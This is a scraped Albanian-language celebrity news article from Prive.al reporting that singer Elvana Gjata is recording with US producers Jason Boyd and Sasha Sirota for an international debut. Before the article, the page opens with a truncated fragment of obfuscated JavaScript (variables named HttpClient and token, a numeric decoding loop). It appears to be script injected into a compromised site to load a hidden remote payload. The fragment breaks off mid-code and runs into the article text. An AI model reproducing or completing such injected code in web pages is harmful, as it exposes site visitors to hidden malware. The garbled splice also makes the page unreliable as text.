;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Enigma e madhe mbi Elvana Gjatën po zbulohet…

By

Këngëtarja Elvana Gjata tash e një kohë është shndërruar në sinonim të misterit me veprimtarinë e saj.

Një reduktim i madh i paraqitjeve në rrjete sociale, thashetheme të llojeve nga më të ndryshmet e përplot pikëpyetje e kanë përcjellur së fundmi një prej këngëtareve më të suksesshme shqiptare.

Çka po ‘zien’ Elvana?! Përse po qëndron shumë e heshtur?! A po bëhet gati për një kapitull të ri në jetë?!

Shumë nga këto dilema dalëngadalë po marrin përgjigjen e tyre duke zbehur pjesë-pjesë enigmën e madhe.

Debutimi ndërkombëtar për artisten e cila pak ditë më parë shënoi tre dekada jetë duket se tashmë është një synim i qartë për të cilin po punohet fort.

Ndonëse vetë nuk e ka thënë as edhe një fjalë të vetme, e aq më pak të ketë lënë ndonjë shenjë, janë bashkëpunëtorët e rinj të këngëtares ata që nuk i kanë lënë hapësirë dyshimeve.

ELVANA PO PËRGATITET PËR SUKSES NDËRKOMBËTAR DHE KËTË E KA SERIOZISHT!

Prive.al ka arritur të mësoj se tash e disa muaj, Elvana ka arritur të depërtojë tek producentë shumë të suksesshëm në Amerikë me të cilët ajo po punon projektet e reja, disa prej të cilëve tashmë janë finalizuar. Një depërtim tek nivel i tillë i producentëve dihet se është shumë i vështirë, për të mos thënë i pamundur pa dy komponentë, lidhjet dhe/ose mbështetjen financiare.

Jason Boyd e Sasha Sirota janë dy prej tyre. I pari, mban vulën e krijimeve muzikore më të sukesshme të Usher tek albumi ‘Confessions’ e Justin Bieber tek këngët si ‘What do you mean’, ‘Where are U now’, ‘Hold Tight’ e ‘All that Matters’. Sirota, krahas punës me Bieber ka bashkëpunuar edhe me Drake si një prej artistëve më me emër që hyjnë në listën e gjatë të bashkëpunëtorëve.

Dy djemtë në rrjete sociale tash e disa javë shfaqin fotografi me Elvanën gjatë punës në studio e cila besojnë se do mbahet mend gjatë!

‘Bota nuk është gati‘ – ka shkruar në një fotografi përkrah Gjatës producenti Jason Boyd teksa Sirota përmes Instagramit, projektin e ri të shqiptares e ka konsideruar si ‘monumental‘.

Duke pasur parasysh faktin se nga këngëtarja e hitit ‘Lejla‘ vështirë rrjedhin informacione, nuk dihet saktë se kur realisht do lëshohet ‘bomba’ e parë e këtij lloji por besohet që nuk do kalojë shumë kohë. 

A do t’i rivalizojë Elvana yjet botërorë në fusha tjera përtej veshjeve luksoze e stilit të jetesës që shpesh po përputhet me atë të Beyonce?! Koha do të jetë ajo që një gjë të tillë do e tregojë. Aktualisht na mbetet të ‘kryqëzojmë’ gishtat duke shpresuar në më të mirën për një tjetër shqiptare me synim shpërthimin ndërkombëtar. /Prive.al

1

bimi 1

Artikuj të ngjashëm